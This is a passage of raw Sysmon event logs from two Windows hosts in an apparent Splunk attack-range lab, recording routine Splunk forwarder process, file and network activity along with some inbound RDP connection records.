Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.579{5EBD8912-8D5C-6151-AA00-00000000FD01}3444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.110{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6731E8C67267B4DF99D10FE52E4EFC91,SHA256=3D04DE8216327BB9E651A4930EAFCC9ABA458AE1FAD5639DC1D81B85726BA182,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D5D-6151-137A-00000000FD01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D5D-6151-137A-00000000FD01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.482{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D5D-6151-137A-00000000FD01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.466{69CF5F33-8D5D-6151-137A-00000000FD01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:37.403{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E3E7F8EFBC44E77774765EE3E19EA92,SHA256=E1807DAD17E5C8F656CA9439BA9236C17B09927846FB901EACDD8BA010F3F7E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:37.751{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=782B0D14D94E9078D62C495A5BF3C847,SHA256=7B03FA17749A9DA06F41861378D5165613018772A04FE703A3A044C87347C25E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:37.204{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A7C3326CBE92C846B8685EDEC0D2C50,SHA256=5EC3DD1E268E1B13AA2B4BCEFBF3DF2AB5DADC89E63B8F97AF53F5A0E1153B9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:34.744{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59526-false10.0.1.12-8000- 23542300x8000000000000000981076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:38.481{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D09CA0B82E28C518AE4E648008B0CB03,SHA256=D92D1487B9DAAE9EC7EF360053A14E7BFD66743C996BE9053034C9B0313E0C7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:38.481{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA8F5F9ACD423C4DF6635C052715E5F0,SHA256=2AB32FED50B216B9DB30ED1940AC5676417638552A02F64EA0432812A5015C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:38.450{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67C1E66BB3DE92C2C9759A51E3BA4DD3,SHA256=8BA83E21F32C4D7EEDB9B65C636424F26BB46B592995DDC0B12BC547208BCA39,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.487{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61560-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.179{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54223-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001056320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:36.047{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61319-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:38.219{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29AB1D924DA86A063BC8AF0D302075A3,SHA256=D0271AB6ADEA1C17FCFE357552D82B986A1309F93179BDD245D4015C810F5932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:39.235{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1ABFA6EC13DB9A7FA7EA0932C583B18,SHA256=5C2F7114FBB2FF79324943DB8622851FE92DCAF3950BCC6B6E67100357E98176,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:39.497{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B87091844D8AE14A67E2D1CB4AC02F8F,SHA256=28EA2131914BACE6E78643DA2DCF782564837AC753E2D40531D87A962D5C93B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:40.235{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E9ECF15F95B1F4D211525BE1221C0E,SHA256=EA280D0C216DB88360333663E05F0AB971A918A9AAA303E6B700EAFAEFBF0E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:40.513{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A99E3020AC9C56F598F07A3AA35D38D6,SHA256=8AEF65F28C693F4C88602F40E872AF7DF7500286713937B50ACE4FD4CF17AA27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:41.267{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C67C37950DCE3C41DE0E218DE4F657E1,SHA256=325A4192EF991F0326AEEF001AA29293474C71684B3D194DBC9A549555564F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:41.591{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D12FA9743A855B6FCF387E700874EFB2,SHA256=7B9D0A9F7EC7F97116474D9BDDA76E3B67551D1F6EEA4658613BF5DB3E5DFD12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:42.809{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1C955C62C9AEA7D2168AB18BDA55E24,SHA256=D2F340F8C3D0BE9EE4E021EFCBDBF864468CB63B45CCB9C3D48E202F8F85B559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:42.502{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F41C2D73243FE392E74D88200E5417A,SHA256=F9D76ED9F1CD5317C7C4BEA28158D077A687FAF66FD70197D7FB6B5DAD378404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:43.560{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6C9DA3128C2B4C93F1241A0BC1BF02,SHA256=67317304309D2E0B821184FE6881A1DD5A8DB15BC44228549CAFFBA7186D0998,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:40.698{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59527-false10.0.1.12-8000- 354300x8000000000000000981083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:40.638{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59764-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:43.352{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D09CA0B82E28C518AE4E648008B0CB03,SHA256=D92D1487B9DAAE9EC7EF360053A14E7BFD66743C996BE9053034C9B0313E0C7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:42.054{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54224-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 